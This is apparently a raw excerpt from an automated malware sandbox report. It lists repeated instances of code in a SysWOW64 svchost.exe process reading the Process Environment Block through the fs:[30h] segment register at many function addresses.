Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]	1_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]	1_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]	1_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]	1_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]	1_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]	1_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310625D mov eax, dword ptr fs:[00000030h]	1_2_0310625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]	1_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]	1_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]	1_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]	1_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]	1_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h]	1_2_031062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]	1_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]	1_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]	1_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]	1_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]	1_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]	1_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]	1_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]	1_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]	1_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]	1_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]	1_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]	1_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]	1_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]	1_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]	1_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]	1_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]	1_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]	1_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]	1_2_030280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]	1_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]	1_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]	1_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]	1_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]	1_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]	1_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]	1_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]	1_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]	1_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]	1_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]	1_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]	1_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]	1_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]	1_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]	1_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]	1_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]	1_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]	1_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]	1_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]	1_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]	1_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]	1_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]	1_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]	1_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]	1_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]	1_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0306A6C7
